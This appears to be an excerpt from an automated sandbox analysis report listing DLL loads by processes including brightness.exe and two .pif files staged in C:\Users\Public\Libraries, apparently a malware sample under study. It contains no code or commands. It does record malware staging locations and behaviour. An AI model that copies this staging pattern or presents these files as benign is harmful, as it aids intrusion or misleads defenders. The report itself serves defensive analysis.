Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: version.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: url.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: propsys.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppwmi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: slc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppcext.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: winscard.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: devobj.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: mscoree.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: version.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: gpapi.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: rasapi32.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: rasman.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: rtutils.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: dhcpcsvc6.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: dhcpcsvc.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: dnsapi.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: secur32.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: schannel.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: mskeyprotect.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ntasn1.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ncrypt.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: ncryptsslp.dll
Source: C:\Users\Public\Libraries\npratlsN.pif	Section loaded: dpapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: version.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: url.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: winhttp.dll
